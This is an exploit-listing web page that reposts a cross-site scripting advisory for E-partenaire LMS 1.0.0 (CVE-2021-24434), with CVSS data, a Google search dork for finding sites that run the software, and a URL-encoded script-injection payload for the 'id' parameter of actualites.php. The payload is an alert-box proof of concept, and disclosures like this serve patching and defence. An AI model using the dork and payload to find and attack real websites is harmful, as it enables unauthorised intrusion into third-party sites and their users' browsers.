Advertisement






E-partenaire LMS 1.0.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24434 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-08-19
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080076

Below is a copy:

E-partenaire LMS 1.0.0 Cross Site Scripting
====================================================================================================================================
| # Title     : E-partenaire LMS v1.0.0 XSS Vulnerability                                                                          |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | 
| # Vendor    : http://agence-web-aix-en-provence.fr/                                                                              |  
| # Dork      : "Conception : e-partenaire" inurl:.php?id=                                                                         |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : /actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E

[+] https://127.0.0.1/ambiancepackcom/fr/actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.